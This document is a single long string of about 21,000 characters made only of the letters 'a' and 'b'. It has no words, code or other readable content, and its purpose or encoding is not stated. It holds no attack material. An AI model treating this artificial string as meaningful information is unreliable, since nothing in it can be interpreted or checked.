bbbaaaaaaaabbabbbbbbbbbbaabbaabbbabaabaaaabaaabbaabbabbbaaabaabbbbbaabbaabaabaaababbbbabababbaaababbabbaababbbbaaababaaaaabbbbbabaaaaaabaabababbbabaabbbbabaababbbababbbbbaabbabbaabbabaaabbbbbbbabaaabaabbabbabbaabaaaaaaabaaabbaaabbabaababbabbbbbbabaabaaabbabbaaaaaaabbbabaaaababbbababbbaaaabaaaabaabaaabaaaabaabbaaabbbaabaaabaabaaaabbaabaabbaabbabaabbabbabbaabbbbbbaabbaaabbaaaabaabbbabaaabbbabaabaaaabbbbaaaaabababbbabbbabbaababbbbbabaabbbabbbaaaaabbbabbabbbbaababbbbaabbbbaaaaabaaaaababbabaababababbbbabbbabbaaaaaababbaabbbbaabaabbbababaaaabaabbbaaabaaaababaaababbbaabbbbaabaababbaaabbabababbbbaababaaabababbaabbbaabbabaabaaaaababbbbabbabaabbbaaabaabaabaaabbabaabaabbabaababaaaabaabbaabaabbbabbababbaaabbabaabaaabbbbbbbbaabbaabababbbbbbabbaabaaabbaabaaabbbaaaababaaaaabaabbabaaabbbbbaaaaaabbaabbaaabbaaaabbbbabbaaaababaabbbaabbbbaaababaaabbabbabaaabbbbabbababaaabaabbbabaababaabaabbabbbbaabbabbaabaaaaaabaaabaabaabbabbbaabaabbbaaababaabbabbaaaabbbbbbbaabababaaaabbbbbabbbbbababbbaaaabaabbaaababaabbabaababbbbabbaabbbabbabbbbabababbabababaaaaabbbabaabbbbababbbbbaaabaaabbabbabaabaabbbaaababaababaaababaaabababababbbbbaaaaaabbabaaaaabaabbbbbaababbabbabbabbbbabaabababbaaabaababbbaabababaabbabbababaababbbbaabbbbababbaabbbaabbbabbbaabbbaabaabbaabbbaaababbbbabbbbbabbabbbbaaabbbbbbbababbbabaaabbbabbbaabbbbaaabaaabbabbaaaabbabbababbaababbaaaabaabbabbbbbbaaaaaabbbabbbaabbbbbaaabbbaabaaaabbbabbabbbabbbbbaaaabbbaabbabababaaaabbabbaaaabbababbabbbaaabababbababbaabbabaaaabaabbabbaababbbbbaaaabababbbbaaaabbbabbaaaaaabababbabbabbbaaaabaaaababbbababbbbaaaaababbababaaababaabbbbbabaaabbaabababaaabbaaabbbaabaabaabaaaaabaabaabbababbbbabbaaabbababaabaabaababbababbbbbbbbaaabbabaabababbbaaabbababbaaaaaabaaabbaabbabaaabbaaabbbbababaaaabbabbaabbbbaabaaaabbbaabababbbaabbabbabbbababbbababaabababbbbabbabaabaabaaaaabbabbbbbaaabbabbbbaabaaaabbbaaaabaabbaaaabbbaaaabbbbabbbbabaabbaaababababbbabbbabbaababaaaaabaaaabbbbaaaabbbababbbababaaabbbaabaabbbbbbbbaaababaababbbabbaabbbababbbaabababaaabbabbbabbabbabbaabbaaababbaababbaabaababaaaaabbbaaaabaabababbbaaaaabaaabbabaaabbbababbaababbabbabbbbbabaaaaaaababaabaaaabbbbabbabaaabbbaaaabbaabaaaaabbbbaabbbbbbbbbbaaaabbbaaaaaaabbaabbabbaababbbbbbaabbaaaabaabaaabaaaaaabababbaabaabaaababaaabababbbabaabbabaabbbaaabbbaabbbabbbabbaaabbbaababbbbbbbabbaabbbaaaaabbaaaabbbbaabaaaabbbbbabbaaaabaaaaaabbbbbabbabababaababbabbbbbbbaabbaaabbaaaaabaaaaaaaabbaaaabbbbbbaabababbaabbbabaababaabbabbaababaaaabbbabbabbabababbbaaaababaaababbaabaabbbbbbabbbaabaabababbaaabaabbaabbabbaaabaabbbbaaaaabbbaaaabbbbabbaabaaaabaaabbbbbaaaaaabaaaabbbabbaaabaaaabbabaaaababbaabaabbabbbbabaaabbabbababaabbaaabbbaaabaaabbabbabaabaabaaaabbabaabbbbabbaaabaabbbaaabbbbabbaaabaaaaaabaaaaaaabababaaaaaabbbbbaaaabaaabbbbaababbabbbbaaababaaabbaabbabaabbbaaabbaaaaaaabaabababbbaabaaabbbbbbaaabbaabbbaabaabababbaaaabbababbbbaaaabbababbaababaaabbbaabaaaaaabbbaaabaabbbbabaababaaaaabbaaaaabbbbabbababbabbbbbbabbabbabaababaaabbbaaabbbabbbaaabbbaaaabbaabbbbaaabaabbaaabbbbaabbabbaaaabbaaaababaababbbbabbbbbababaabbaaababbabbbabaaaaabaabaaabaababbaaabbaaaaabbaaabbbababaabbabaababaabaaabaabbaababbbbbaabaaabaabbbbaaaaabbbbbabaababaabbaaabbaabababbbabbbbbabababbabaaaaabaabbbababbbabaababbbabbaaabaaaabababbaababaabbbbbaababbaabaaabbbabaabbabaaaabbabbbbbabbbababaaabbaabaaabbabababbbbaaababaababaaabbbbaaaabbabbbbaabbbabbabbabababbababbbaaabbbaabaabbababbaababbbbabbbbbaabbbabbbaaaabbaabaabaabbbaabbbabbbabbaaabbbbabbbabaabaababaababbaabbaababbabbabbaabaaabaaaababaababbbbaabbabababbabbbbbbaababbbbbbbbbabaababbbbababaaabbaabaaababbabbbaababbaabbbbabbbbbaaaabbbabaaabbbbbababababbbbbbaabaaaaaabbaaaaaaababbabbaabaabaaabaabbbbbbbbbbbbabaabbaabbbbaaaaabbaaaaababbaabbbbbbabaabaabbbabaabaababaabbbaaaaabbabababbbbbaaabbbbaababbaabaaabababaaabbaaabbbaaabbbabaaabbbbbbbbbbababaaabbbabbaaabaaababbbbabbaabbaaababbbbabbabababaaabbaaaaaaabbabbaaaabaababaaabbaabbbbaaabbaaababbbaabababaabbbbababbaaabbabbbabbabbaaaaabbabbaaaaaabababababaabbaabbabbaabaabababbaabaabbaaabaabbaaabababbbaabbaaaabbabbbbabbbbbbbbbaaaabbbaaabaabaabaaaaabbbaaabbababbaaabbaaaabbabaabababababbababaaabbbbbbbbbaaabaabbbbabbbaaabaaaaaaaabbaaaababbabbbbbaaabbbbbbbbbbbbbabaabaaabbbaaabaabababaabbababbababbbabbbabaaabbabbaabbbbaaabaabbbabbabbbbabbababbbaabbaabbabbabbababbbbbbabbbbbbabbabbbaaababbbaaaabaabbbbbbabbbbaabababbbbbbbbaababababaabbaaaaababaaababaabbabbbababaaabbbaabaaaabbabaabbaaababbabbbbaaabbbbbabaaaaabbbbaaaaaaabaaabbbbbbababababababbaabaaabaaabbbbabbbbaaabbbabbbabaaabbbbbabaaababbaabbbaabaaababbaabbaabbaabbabaabbbaaaababbbabbaabaaabbabbabbbababbbbaabbaabbbbbaababbaaabaaabbabbaabbbbbabaabaabbaaabbaabbbbabaabbbabbabbbabbaaaaababaababbaabaabbbbbabbababbabaaaaaabaabbabababbabbabbabaaaababbabbbaababaaaaabbbbbbaabaaaaabaaaabbbabababbaaabbbabaabaabbbaaaaaaaabbbbbbbbabbbabbbabbaabbabbaaabbbababaaaaaaaaabbbbaaabaaababbbbabaabaaabaaaabbaaaababbbbbbbaaabaaaabbaaabbaaaaabbaaabaaabbbbabbaababaabaaabbbabbbaabbbabbababaaabababbbbababaaabaabbabbbaababbaaababababaaaaaabaaaaaabbbaabbaabbbababbaaaaabbbabbabaabaaabababbbbabbbbabbaabbbaaaabaaabaabbaaabbabbbaaaaababbabbaabaababaabaababbbabaaaaaabbbabbababaabbbbabbbbbbaaabbbabbbaaaabababbaaabbabaaaabbaaaaabaaaabbbabbabaaaababaaabaabbbbbaabaaaaaaaaaaaaaabbbbabbaabbbbabbbaabbabbaababaabaababababababaaabbbbabaabbaaabaababababbbabbaaabaabbaaabababbabbbbbaabbbaabababaabaabbbbbbabbabbabbabaababaababaaabbabbaaabbabbabbababababababaababbbbababaaaabbbaabbaaabbabaabbaabaabbabbabbbbbbbbabbbbbabababababaababbaaaabbabbbabbababaababbaabbbababaaaabbaaabbababbaababbbababaaabaaaabababaaaaaabbbbbabbabbaaabbbbbbbbabbaabbabbaababbbbaababbaabbababbbaababaabaababbbabbabaabababaabaaaaababbbabbbababbbaabbabbbbaaaabbbaaabbbabaabababbabbbbbaabbaabbaaabaaaaaaabbaabaaaaaaabbbbababbababbbabbbbaabbbabaaaabbbabbbaababababbabaabbbaaaaaaaabbbbbbabaabaaaabbabaaaaababbaaabbabaabbabbaaaaaaaabbabbabaaaabaaabaababababbaababaaabaababababababbbbababbabbaababbbabbbbbbbaaaaaaaabbbbbbabaabbabbabbbaaaabbbbbaaaababbbaabbabbbaabbbabaabbabbbababbaabaaabbbbbbaababbaabbaabaabaaaaababaabbabaaaabbabaababbababaababaabbbabbbabbabbbbbaabbbababababaaaabbabaaaaaaabbbabababbaababaaabbbaaaaababbaaaababbbaaabababaaabaabbbbbbaaaabaaabbbbbbbbbababaabaabbbabaaaabbbbbbabaabbbaaaababbaabaababbbaabbaaaabbbaabbbbabbabbbaabbababbaaababaaabbaaababababbabbbbbbbbabaabbbbabaabbaabbaaaabbbabaabbbbaabbababbbbbabbabaaaaaabbbbbaaabbabaababbaabababbaaaaaaaabababbbbbbbababbabaaaabaababaabaabbbbaaabbbababaabaabbaaabbabbbbababaaababbbbaababbbbabbbabaababaababaabbabbabababbbabbbabbbaabaabbbabbbbbbbaabbbbbaaabaababaabaaabaaabaaaabaaaaabbaaaaaaababbbbababbaabbbbabababbaaaaaabaaaabbbbaaaabaaaabbabaaabbaaaababaaabbbbabababaabbaaabbabbaaabbaabbbbaaababbabbbbbbabbbbaabaabaaabbabbaaaaabbabaabbbbbbaaabbababbaaaabbaaabaabbababbbbaaababbbbababaaaabbabbaabaababbaaaabbbbababaaaaaabbaaaabaaaabbabbaaababaabbabbaaabbbbbbbbbaaabbaababbaababbaababaaabbbabbbaababababbabaabbababaaabbbbaabbabbbaaabbbababaaaabbabbbaababaabbbbbababbbbaabaaabababaabbbaaabbababbaaaabbaabbbabbaabbbbbaabaaaabaaababbabbbbaabaabaabaabbaabaaaaabbbabbbbaaaabbaabbbbaaaaabbbbaabbabbbabbbbabbabababbaaabbbaaaababbaababbbaabaaaabbabbabaaaaaaabaaababaabbaabaaaaaababbbbbbaabbaaabbbbaabbabaaabbbbababaaaaaabbbbbaabaaabaaaababbbbbbbabbbaaabbabababaabbaabbbbaaaabaaaababbbabbbbabaababaaabbbaababbaaabaabbbaabaaaabbbabaabaababbaabbbaaabaaaaaaaabbbaabaabbbabbbbbbbaaaababbbabbaababbbaabbbabaabaaabbaaaaaaababbaaaabaababbbabbaabbbbaaabaaabaaabababbaababaabbaaabbababbabbbabaabbaabaaaaaabbabbbbbbaabbbbabbabbabaabaaabaaabbabbbaaabbbabaaaabaaabaabbaaaababbaababbaaabaaaabbababaaaaaaaabaabbbbbbabbaabaaabbaaabbbabbabbbbababaaabaaabbbabbaabbbabaaaabbaabaabaaaababaaabaaabbaababbabaababaabbbbaabbbbabaabababbbbbaabbbaababbabbbabbbaabbbabbabaaabbbaabaaababbbbaaaaabaabaaababbbbbabaabaaaabbaaaaabbabbaabbaaaaabbbabaaabaaababbaabaabbabbbbaaabbaabbbabbbbabaabbaaabbabaaabaababbabbaabbbbaabbbbabbbaababbbbaabbbbbbbbbbbaaaabababbaabbbababaaabaaababbaababaabaaaaaaabababaabbbabbabbbbabaabbaaaabaabbababbbbbabbbaabaabbbbabaaabaaaaaabbbabbbaabbaaaaababaaabababbabbaaabbbaabbbabbaabaababaabbbbbababbbbbaaabaabaaaabbabaabaabbbbaabbaaabbaababbababaabababaabbbbbbabaabaababbaaabbbbababaabaaabbabaabaaaaaaaaabaabbaabbaaabbabbbbaabbbabbaababaabbaaabaabaababaabababbbbabbbabbbbabaaabababbababaaaaaababbbaabbbabaaabababbbbbabaaababaaaabaaaabbabbaaaababbbaabaabbaaabbbbbabaabababbaabbbbbaabbbbabaabbaaabaababbabababaaabbbbbaaaaaaaabbaaaabaaaabbbbaaabbabaabaabbaaabbaaaabaabaaababaaababaaaabbaabababbabbababbaabaabbabbaababbabbbaababaaaaababaaabaabaabbbabbaaaabbaabbababbaaaabaababbbbaababbbbbabaaaabaabaaabbaaabababbabbaaaaabbaabaaabbaaaaababbaaaababbaabaaaaaaabababbbbaaaaabaabbabaaaabaaaaabbbbabaabbaabbaabababbaaabaaababbabbbaabbbbabbabaabaaaaaabbbabaabbbbbaaaaaababbaabbaaaaabaaaabbaabaaabaabaabaababaaaaaababaaabbbbbbbaabaabbaababbabbaabbbaaabbabbbabbaaaaabbbaaabaabaabbbbabbaabaaaaaaabbaabbbbbabbbabaabbbaabbabbbbbbaabbbaaabbbabbbababaaabaababababbaaaababbbaaaaaaabbbabbaaabbabbabbbbaabbabbababbbaaaaaabbbbbbabbaabaabaaaaabaabaabbbbbbabaababbbbaabbabbbbaabaaababbbabaabbbababbbbaabbaaaaaabbbabbaabbbababbbbbaabaabbaaaabbabaaaaaaaabbbbabbbbbbbbbbaaaababbbbbaaaabbbaaababaababaabbababaaaabbaababbbbaababbbaaaaabbbbbaabbbabaabaaabbabbbaabbabbaaaaabbaaaaaabaababbbaabaaaaabbbabaababbaababbbabbaaabbbbabaabaabbaaabababbbbabbbbabaaabbaabbbabbabbabababaabaaaaabbabbabababaaaabbbabbaaabbbababaaaaaaaabaabababbababbbaaaabbabaaaaabbbbaabbaaaabaabbaababaabaaabbaaabbababaababbaaaaaaababaaaabaabbbbababbaaaaaaabaabaaaaaabbaaabbbaabaaaaaabbababaababbbbaabaabbbabbababbbaabbabbabbabbabbbaaabaabaababbbaabbbaababbaaabaabbabbbbaaaabbbabbbaababaababbbbbbabbabbababababbabbbababaababbbabaabababbabbbbbabbababbbbabaabaaabbaababbbaabbaaabaabbbbbaabbaabbbbabbabababbababaabaaaaababbbaaabbabbabbbabbabbaabaaabbaabbaababbbababaaabababaabaaaababbabbabbaaabaababbabaabbababbbaabaababbabaabaaabbbbabbabaaaabbbaabaabbbbabaababbaaabbbaaabbabbbbaabaaaaabababbbabbababbbababbabaaabbaabaabbbaaaaaababbaabbaabbabaabbabaaabaaabbabbbabbbaabbaabbbbaaabbbabaababbbbbbaaababaabbabbababbbbabbababbbbbbabaabbaaaaababbabaaaaabbaaaabaaabbbababaababbbbaaaabbabbaabbaabbaabbbaaababbbbbbaababaaabbaaaabbaabaaabaaababbbaabbbaaabbabaababaabbabbababaababaababaaaaaabbaaaababbbbbbabbaabaabbbabbabbabbbaaaababbaabbabaaaaabbbbabbbaaabababababbaaaabbabaabbabbbaaabbbbababbaaaabbabbbbbbbaaaabaaabababaaababaabbababaaabbbaaaaaaaaabbbabaabbaaaaaaaaabbbabaababaabababbbbabaababbabbbaaabbbbaaabaabaababaaaaabbbbbbbabaaabbaabbbbbabbaabbaabbaabbabaaaaaabbbbbbaababaabbabaabaababbaaababbaabababbbbabaaaabbbbaabbbabaaabaaababbaabbbaabbaabbaabbabbbababbabaaababaaabaaababaaaabbbbaabaaababaabbbaaabababbabbabbbbaabbaaabbbbababaabbaaaababbbbbabbabbbbbabbbbabaababbaaabbabaaabbabaabbbbaabbabbbbbabababababbaaaabbaabbbaabbabaabbabaaabbbabbababaabaababbabbaabaaabbaaaaaabaaabbbbbaaababbbabbaabbbbababbbaabbbaaaaaabbbbaabbababbbababbbabbbbaabbbbbbaabbbbababbaabaabbaaaaaabbbaabaaabbbbbbbbaabbbbaaabbbabaababbaabaababbbaaabababbaaaaaabbabbaaaabbbabaabaaabaabbaabbababbbbbbbaabbaaababaaaabbabbbbbbaaababaaabaabababaabbaaabbbaabbaababbabbabbbabbaabaabbbbbaaababbaaabbbaabababbabababaaabaaabaaaaabaabbaaabbabaabbbbaabbbabaaaaabaaabaaabaabbabbabaabbbabaabbaaaabbbbbaababbbbabbabbbbbaababbabababababbabababaabbaaaaabbabaaaababbbaaababababbbbbaabbbbaaaaabbbbabbbbbababaabbbabbbbabaaababbbbbabababbaaabaabbaaaaaaabbbbbbbabbbbababababbbbabbaababbabaaababbbababaaaabbbbbaabbaabbabaaabbbabbbabbaaabababaabaaabbabaaaaaaaabbabbababaaabbbaaaabbbbababbaaaababbbbababbbababbbababaababbaababaaababbabbbaaabaabaaabbabbbbbbbabbaabbbbabbaabbabaababaaaabbbabaaaababbbbbabbaaaabaabaaababaabaaabbaaaabbaabbaaaababababaabaabbaaaaababbabaabbbbaabaaabbabaabbbbbbbababbaaabbaaaaaabbbbbabbabbbaabbabaabbbabbabaaaaabbbbbbbabaaabaaababbaabbbbbaaabbaaaaaabbaabbabaaaabbabbbababababbaaaabababbaaababbaabbaabbabababbababbbbaababbbaababbababbabaaabbbbaaababbaabbbbbbbaababbbbabbbbabbabaababbbbaaaaaabbabbbbabaaaabbaababbaaaababbaaaabbbbbaaaababbaabababbabaaabaaabbbaaababbbabaaaaabaabbbbaaaaaabbbaaababaaaabbaaabbababaabababbababbabbaababbabaabbabbabbababbaaabbaabbbbbaabbabbabbabaabbbbbbbabaabaaababaaaaaabaababbaabbbbaaaaaabbbbbaaababaaaaabbbbbaabaabaaaaaaabbababbbabbbabbbabaabbbbabbbbbbbbaaaaababaaaabbbaaabaaabaaabbaaabbbbabbbbbbbaabbabbbbaababbaaaaabaaaaaaaababbbbababbbabbabaabbbbabbbabaabaaaaabbabababbaaaabbbaaaaaaaaaabaaabaabaaaabbbbbabaabbbaabbbaabbbbbbbaaaabbaaaaabbbbabbaababaaabbbaaaaababbbaabaabaaaaaaababaababababbabbababbbbabababaabaababbaabbaaababbbbbabaaabbbabbbabbaaaaaabaabbaaaaabaabbbbbbabaaaaabbbbaabbbaabbababaaaaabbaababbbbbbbbbabbabbabaabbababbababbaabbaabbaaaabaabbabaabaabbbbabbbbbbaabaabbbababaaabbabbbaababaaaabaaaaaaabababbbaabaaabaaaaaaababaaaaaabbaaabbabababbabaababaaaababaaabbbbaaabbbaaabaabababbaaabbaaaabbbbbbaaabbaaaababbabbbbaabbbbabbbbabbabbabaabaaabbabbbbbaaaababababbbaaabbbaaabbbbaaaabbbabbbaabaaaabbbbaaabaabbababbbabbabbbabbbbaaaaaabbaabbabbbbbaaabaababaabbbaaaaabaabaabaaaaaabbbbabbabaabbabbbaabababaaababbaaaabbaaaaabababbbbbbaaaabababbbababbabaabbbabbaabaaaaaabbabbbaaababbbbbbaabbbaabaabbaaaababbabbabbbabbbbaababababababababbbaaaaabababbbaabaaababbbabbaaaabaabbbbaaababbaabbaaabbbbabbaababbbbaaaabbbbabaabaabbaabbbbaaaababaaaaabbbbbababbbaabaabbbbaababbaaabbbaababbbbaaaabbbababbaabbbbbbabbbbaaabaabbbbabbbaabbbaaababbbabbabbbbbbbaabaaabbbabaabbbbbaaaaabaababaaabbaaaabbaaaaaabaaabaabbabbaabbaaaababbbabbbababbabbabbaabbbabaaaabbaabbbaabbabbaaaabbbaababbabbbbaabbbababbbbbbbaabaaabbbababbbabaaabbbbbbbbababbbbbbababbbbbbabbbbbaababbbbbbbabbabbaaababbbababbabbabaaabbbaabaababaabbababbbabbaaabbaabbabbabbbaaababbaabbaabbbbbababbaabbaaabaababaaabbbabaababbbbbbbbbbabaabbbbaababababbbaabbbabaabaabbaaaabaaaaaabbabbbabaabaaababbaababbbbbbbbbabbbabaaaaabababbbaaabaaabaabbaaaaababaaaababbaaaaaaaababbbbabbabaabaaaabbaaaaaababaabbbaaabbababbbbaababababababaababaabbbabbabaaabaaabbbbbbaaabaaabbbbbbaababaabbaaababbaaaababbaaabbbaaaaaabababbabaaabaaabbbbabaaaaaaaaabbaaaabbabbabaababaaaaababbbbaaaaaaaaaabbabbaaaabbbaaaaaabbabbbbaaaaaabbaabbbabbababbbaaaaaaaaabaaabababbabaabbaaaabababbbbbbbaaaabbabaaababbbbabaaaaaabbababbbababbbbbababbbaaababaabbbbaaabbbabaababbabbaaabbbbbbaabbbababbbabaababbbbaababbaaaaaaabaaabbbaabbaabbabbabbababbbbaaaababbbababababbaabbaabababaaabaabbbaaaabababababaaaabaaabbaaababbababbbbbabbbabaabbababaaaabaaaaaabaabbababababbabbabbababaabbbabababaabbbabaaabbbabaababaaaaaabbaaabaababbaaabbaababbbaabbbabbbbaaababaaabbbbbaabbaaaaaaabbabbabbababaababaaababbababbbbabaabaabaaaababaaaaabaaabbabbbaaababbbabbabababaaabbbabaaabaabaaababbbabaaabbaabaaaabaabaabbababbaaabaabaabaaababaaabbabbaaababaaabbabbaaabbabbabaaabaabbbbbbabbaaabaabaaabbbbababababbbabbaabaabbaaabaabababbbaaabbabaabaaaababbbaaabbabbbbaabbabbaabbabbbaabbaaabbbaabbbbaaabaabbabaaaababababbabababbbabaaaaabbbbbabaaaaabbbbbbabbbababbaaabbbaabbaaaaabaaaabbaabbabbbbabbaaabaaababaababaababbbababaabbbabbabbbaaabbbabbbaabaaabbaabbbaabbabbbabaabaaaaaaaabbbaabbbabbbabbbbababbbaabbbbabbbbbababaabbabbaabaabbababbbaabbabbbbaabbbabbabaaaababaaabaabababbaabbbaabaaababbaababababbabbaaaaaaaaaabaabbbabbabbaaaababbbababbabbbbbbabaaabbbababaabbbabbabaaaabababbbaaabaaaaabbaabbaabbaabbaabbabbbbbaabaabbabbaabaabaababaabaaabbabbaabbbbbaabbbbbbaabbbbaababbaabbbaaaabaabaabbbabaaababaaaaaabbaaababbaaababaaabbbaaaaaaaababbabbaaaababbbaaaaaababaabbaaabbbabbababbababaaaaabbbabababbaaaaaabbbabbbbabbbbbbbaabbbbbbbbaabbaaaabaabaabbaaabbabbaabbababaaaaaaabbaabbaabbabaabbbbaaaaaabbbbabbabbbbabbaabaaaabaaaababbaaaababaaabbabababaabaabbaaababbbbbaabbaaabbbbbbbbbababababaaaabababbbaaaabaabaaabbbaabababaaaabaabbbbbbaaaabababbaababbabaaabaabaababaababaaaabababbabbabbbababbbaabbaabbaabbabbbbbbaabaabaaaaaabaabbabababaaaabbbbbaaaaaaaabbaababaabaaabaabaaaababaabbbabaabbabbbabbbabbaaabbaababbaabbaabaabbababaabbbababbabbabbabbaababaaaabbbbbabaaaaaaaaaaabaabaabbabaababaaaaaaaabaaaabbbbbbbabababbbbaaabaaabbbbbbbbbaaaabbbaababababbbabbbabbababaabaabbbbabbbababababbbabaaabababbbaaabaabbbaababbaaabbbbababbabbbabbbaabbabbabaaaabaaabbaaabbabbabbbbaaaabbabbbbabbabbbbababbaaabbbbabbbbbaaaabbabbbaabbbababababaabbbabbbaaabaaaaaaabbaaaabababababbbbabbbaabaabbbbabbbbbabababbabbabbbbbbbbbbaaababbbabbbbbabbaaababaaabababaaaaaabbbbaabbbabbabbaababbaaaabababbbbaababababaabbbaabaabaaababbabbaabaabaabaaaaaabaababaaabaaaababaababaaabbaaabababbbaaaaaaaaabbaabaabbaaaababbabbbabbbabababbaabbabababababbbabbaaaabbaaabaabbbbaabbaaabbaaabbaaaabaabaaabaabbabbbbbbaaaaabbbbaaaabaaabbababaabbaabbaababbabaaabaaaabbbbaaaabbabbbbaabbbbababbbbbaabaaaaaaababbaabbabbaabaaababbbaaaabbaaabaabbbaababbaababbbbaabababaaababbaabaaaababbbbbbbabaabbbbaabbbbabbbabbaabbabaaababbaabbaabbabbaaaaabbbabaaababbaaaaabaabbabbbbbabbbbabbbabbabbbabaabbaaabaaabbabaaabbbababbbbaababbbbbbaabbbbbbbabaabbabbbaabaaabaaaaaabbbbbaabbaaabbaaabaaababbbaaaabbabaabaabbababbabbbbbaabaababaaaabaaababbbbbbabbabbbaaaaabbabbbabbbbbbbbabaaaabbbaaaaaababbbaababbbbabaabaaabbaaabbabbaabbaaaaabaabaabbbbbbbabbbabbaababbbbaaababbbbaabaaababbaabaababbababaabaabaaabbbaaaabaabbabaabbbaaabaabbaabababaabaabaabbbababbabbbbababbbaabbbaabbbaaababbabbbaabaabbaabababaabbbbaabbbaaaaabbbbbaaababbabaaaabaabaaaabbaaababbababbaabbabbabbaaabaabbaabababbbaaaaaaaabaabaaaaaabaababbbbbbbabbbabbaaaabaaaabbabaabaaaabbababaababbbaabbabaabbababbbbbbbbabbbbbbbababaabaaababbbabbabbbabbbbabaabbaaabbaaabbabaabaaaaabbaabbbbbbbabbbabbabaaababbabaaaaabaaaaaababaaaaaaaabbaabbabbaabaaabbbbabbababbbbbaabbababaabaabbbabaababababaaabbaaababbaaaabaaaaabbbabbbbaaaabbababbaaaaabaabbbbabbabbababaaabaaaabbbbbaabaaaababaaaaaaaabaabbaaaababaaaabbaaaaaababbbbbbaaaabbabbaabaabbabbaaaaababbbabbabaaabaaaaabbabbabaaabbabbbabbaaaabbaaabbbbbabaabbaaaaaabaaabaabbbabbaabbbabbaaaabbaababbbbbbabbabbaabbbbbaaaaaaabbaaaaabababbbabbbbaabaabbaaabababbbaaaabbbaaaabaaaabaaaaababaabbabbaabaababababbbaabababbababbaabababaababbabbabbabbbaaaabaababbbbaabbaaaabaabbaabbbbabbaabaaaababbbbaaababbbbaaaabbaabbaababababbababababbbaaaaabaabababbbbbbbabbbaaabbaaaabaabbbaaabaaaaabaabbaaababaaaaaabbabbbabbabbbaabaabbaabbbaaabaaaabbbbababaabbbbaabaaaaaabbbbaaaaabaaaabaabbaaababbbbbbabbbabbaabbbbabbbaaababababbbaaabaaaabbbbaabbbbbbaabbbabbbbbababbbbabbbaaabababaaababbbaaabbbabbaaababaaaaabaababaabbbbbbbaababbbabaaabbaabbbbabaaabaababbbbaaaaabaaabaabbababbabaabbbaabbbabbaaabbbabbbbbabbaaabaaabaabbbaaabbbabbbaaabaabbbbaabaabababbbabbbabababbababbbaaabaabaaaabbaabaaaaababaaaababaabbabbbaababababaaabaabaaaabaaabbabaabaaabbaaaaabbbbabbbabbaaaabbabbbabbbaabbbbbbaaaaaabbaaaabaaabababbaaaabaabbababaaaaabbbaaaaabbaabbbbaabaabaabaabbaaaababbaaabbaaaabbbbbababbaaabbababaabbabaaaaababbbbaabababaabababbbabbabbbaabaabaabbaaabbabababbaaaabbabaabbbaabbbbbaaababbbaabbaaabaababbbbbbabbabbbaabbbabaaabaabbaabaabbbaabaababaabbbaaaabbaaabbababbbabaabbaabbaabaabbbababaaaabbbbaaaaaaabaabababaababbbbabbababbbbabababaabababbaabbbbbaaaaabbaaabababbaabbbbaaababaaaabbbbabbababbabbbababbbbbbaaaaabbaabaaaaaabbbaaaaaaabaaabaabbaabbbbbaaabbbababbaabaababaabbabbbaabbabbabaabbbaababbbbaaaabbbabbbbababbbbabbabbbbaaaaaaaaabaaabbbaaaaabbbaabaabbaaabaababaabababaabababbbbbbaabaaaabbaabbbabbaababbabbbbaababbbaabababbbabaaaaaababbbabaaaababbbaabbabaababaaaabbbababbaaaaababaabaaabbbbbabbaababbbbbabaabbbbaaaaaabbababbbbbbabbabaaaabbaabbaaaaabaaabaaabbbbbaabbababbabbbabbabbbabbbaaababaaabaaaabaabaabbbaabaaabbaabbbbaabbbbaabbbaaaabaabbbaababababaaabababbbaabaaabbaaaaababbbabbbbaabababbabbbbaabbaabaabbababbaaaabbabbaabbbbbaaabbaabaabbaaabababbbbbbaababbbbaaaabbbaaaabaaabaabaababbaabbaaaababaaaaabaaaabababaaaabbbabaabbbababbbbbabbabbbbabbabbabaaabbbbbbaabbaaaaabbabbbbabbbaabaababaababaabbaabbaaaababaaaababbbabbababaabbabaabaabbbabbaaabbabbbbbbbaabaaaabbbbabbbabbbbaaaaababaaaaaabbababbbaaabbababaabbbabaababaabaabbabaaaaaabbaababaaababababbbbbaaabbbbbaabbbbbbabbaaaabbabbababaabbbbbaabaabaaaaaabbaabaaaaaaabbbaaabbabaaabbbabbbaabbaabbaaabaabbbabbbabaaababaabaaaaababaabbbbaabaabbaabaabbabaaabbababababbabaaaababbaaabbabbaabbaaabaaaaabaaabaaaabaaaabaabbaabaaabbaaabbbaababaaaabbaabbaaababbbaaabaabaabaabbababbaaaaababaaaababaabababbaababbbaaaaaaaaaaababbaabbbabaabaaaaaabaaaabababbbababbaaabbbbaaababbbbaaabbabbaaabbabbabaaabababbaabbabbbaaabbbbbaabbbbbbabaaabbaaababbaabbbabbaabbbbbaabbbbaabbbabbabbabbabaabaabbaababbabbaabbbbaabbbabaababaabaababaaababbbbababbabaaabbbbbbbabaabbbbbabaaaaaaaaaaabaaaabbbaabbabaabaabbbaaababaaaaabaabaabbbabbabbabbaabaaababbbabaabababababbabbbababaaaabbbbbabbbbbaaabbbbbbbabbabbaabbababbbaabaababaaabaaaabbbabababababababbaababababbbbaaabbbaaabbbbabbabbaaaaabaabaabbaabaaabaabbbbaabaaaabaabbaabbbbbaaaabbbbabaaaabbabaaabbaaababbbbbaabbaabbabbabbabaaaabaaaaabbbaababbaaababaaabaababaabbbabababababbbabababaaaabaaababbbbabababababaabbabbabbaabbbaabbbbbbbaaabaaabbbabbbaaaaababbabababaabbaababababaaaabbabbaaabbabaaabbbababbbbbbababbbbabababbababbbbaabbaabaabaabababbbbbbaaabbaaababababbaaaaaaaabbbaabaaaabbbabbaaaabbbabbbabbabbabbabbaabbbbbbbaaaaababbaabaaaaabaabaabbbbaaaaabaaaabaabbbbbbaabaaaababbabaaaabbabbababaaaaaabbabaabbbbabbaaaaabbaabbaabaaabaabaabbbbaaabbaababaaaaaaabaaabbbbbabaababbabaabaababaaaaaabbbaabbaabbabbaabbbaababaabaaaaaabbaabbababbabbbabbbabbbbabbabababaaababbaaaaababaabbaabaabbbbaaaaabaabaabbbaaaabbbbaaababaabaababbabbbbbaaaaabbabaabaabaaabbbaababbabaabaaaababbababbbababbbbabbbbbabbbabbbbbbbbbababbbaaaaaabaaababaaaaaaabaaabbbabbbababbabbbabbaaaaaaababbaaabbabbaabbbbbbababaabbbabbbbbababaaaaaaabbabbbbabaaabaaababbbbaaaaabaabbbaabaabbbaabaababaabaabaaabbabbababaabbbbaaaababbabbabbbbaaababbbaaaabbbababbbabbabaabaaabbabbbabbaaaabbaaabbbbabaababbaaabbbaaabaaabbababaaabaabaaabaabaaaaaababaaabbbaabbbbabaabaaababbaababbbaaabaabaaaabbaaabbbbbaaaaaabaaaabaababbbbaaaaababaaaaabaabbaaaabaababbaabbaabbbabababbaaaaaaabaabbaabaabaaabaabaaabaababbabbaabbaab